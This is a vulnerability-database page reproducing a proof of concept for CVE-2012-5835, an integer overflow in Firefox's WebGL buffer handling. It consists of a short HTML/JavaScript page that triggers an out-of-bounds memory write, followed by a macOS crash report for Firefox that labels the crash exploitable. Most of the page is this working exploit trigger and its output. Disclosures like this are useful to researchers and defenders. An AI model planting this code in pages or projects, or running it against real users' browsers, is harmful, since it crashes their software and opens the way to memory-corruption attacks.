Recent Vulnerabilities Research Posts Trends Blog About Contact
Related Vulnerabilities: CVE-2012-5835
Publish Date: 15 Feb 2017
Source
                							

                # Exploit Title: Integer overflow happens WebGL system in Mozila Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash
#Tested On:MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps(Mozila)
&lt;html&gt;
  &lt;head&gt;
    &lt;script&gt;
      gl=document.createElement('canvas').getContext('experimental-webgl')
      var buf = gl.createBuffer()
      gl.bindBuffer(gl.ARRAY_BUFFER, buf)
      var magic = 0x12345678
      gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
      gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
      gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
    &lt;/script&gt;
  &lt;/head&gt;
&lt;/html&gt;
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb  %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address.  Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process:         firefox [3732]
Path:            /Applications/Firefox.app/Contents/MacOS/firefox
Identifier:      firefox
Version:         ??? (???)
Code Type:       X86-64 (Native)
Parent Process:  exc_handler [3731]

Date/Time:       2017-02-15 10:44:52.818 +0300
OS Version:      Mac OS X 10.8.1 (12B19)
Report Version:  9

Crashed Thread:  0  Dispatch queue: com.apple.main-thread

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib               0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1   GLEngine                        0x000000010cfa9982 glBufferSubData_Exec + 856
2   XUL                             0x00000001020df955 0x10111a000 + 16537941
3   XUL                             0x000000010257424b 0x10111a000 + 21340747
4   XUL                             0x0000000102564622 0x10111a000 + 21276194
5   XUL                             0x0000000102573ae2 0x10111a000 + 21338850
6   XUL                             0x0000000102573ce9 0x10111a000 + 21339369
7   XUL                             0x0000000102573fe5 0x10111a000 + 21340133
8   XUL                             0x00000001024f2d2d 0x10111a000 + 20811053
9   XUL                             0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10  XUL                             0x000000010182121d 0x10111a000 + 7369245
11  XUL                             0x00000001015ef000 0x10111a000 + 5066752
12  XUL                             0x00000001015f0538 0x10111a000 + 5072184
13  XUL                             0x00000001015f117a 0x10111a000 + 5075322
14  XUL                             0x00000001015ee4bd 0x10111a000 + 5063869
15  XUL                             0x00000001019a41b6 0x10111a000 + 8954294
16  XUL                             0x00000001019a6285 0x10111a000 + 8962693
17  XUL                             0x00000001019aa94d 0x10111a000 + 8980813
18  XUL                             0x00000001021324f3 0x10111a000 + 16876787
19  XUL                             0x00000001020f1c0e 0x10111a000 + 16612366
20  XUL                             0x0000000101f5b009 0x10111a000 + 14946313
21  XUL                             0x0000000101f1f4bf 0x10111a000 + 14701759
22  com.apple.CoreFoundation        0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23  com.apple.CoreFoundation        0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24  com.apple.CoreFoundation        0x00007fff918204e5 __CFRunLoopRun + 789
25  com.apple.CoreFoundation        0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26  com.apple.HIToolbox             0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27  com.apple.HIToolbox             0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28  com.apple.HIToolbox             0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29  com.apple.AppKit                0x00007fff96591fa3 _DPSNextEvent + 685
30  com.apple.AppKit                0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31  XUL                             0x0000000101f1e942 0x10111a000 + 14698818
32  com.apple.AppKit                0x00007fff96588c03 -[NSApplication run] + 517
33  XUL                             0x0000000101f1ed2d 0x10111a000 + 14699821
34  XUL                             0x0000000101d867b4 0x10111a000 + 13027252
35  XUL                             0x0000000101121193 0x10111a000 + 29075
36  XUL                             0x0000000101125fbb 0x10111a000 + 49083
37  XUL                             0x00000001011264c3 XRE_main + 307
38  org.mozilla.firefox             0x0000000100001e15 0x100000000 + 7701
39  org.mozilla.firefox             0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0xffffffff0b4f3400  rbx: 0x000000011506ac00  rcx: 0x0000000000000000  rdx: 0x0000000000000001
  rdi: 0x0000000012345678  rsi: 0x0000000106e521d1  rbp: 0x00007fff5fbfb9d0  rsp: 0x00007fff5fbfb9d0
   r8: 0x0000000000000000   r9: 0x00007fff5fbfb970  r10: 0x000000010a50c5b0  r11: 0x0000000012345678
  r12: 0x0000000012345678  r13: 0x0000000113607b68  r14: 0x0000000113607b40  r15: 0x0000000000000001
  rip: 0x00007fff92c82a41  rfl: 0x0000000000010206  cr2: 0x0000000012345678
Logical CPU: 2
<p>
Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.
Home Recent Vulnerabilities Research Posts Trends Blog About Contact
Vulmon Search Vulmon Research Vulmon Alerts Vulmap
Twitter Reddit Linkedin Facebook
Mozilla Firefox WebGL Proof Of Concept

Vulmon Search

About

Products

Connect
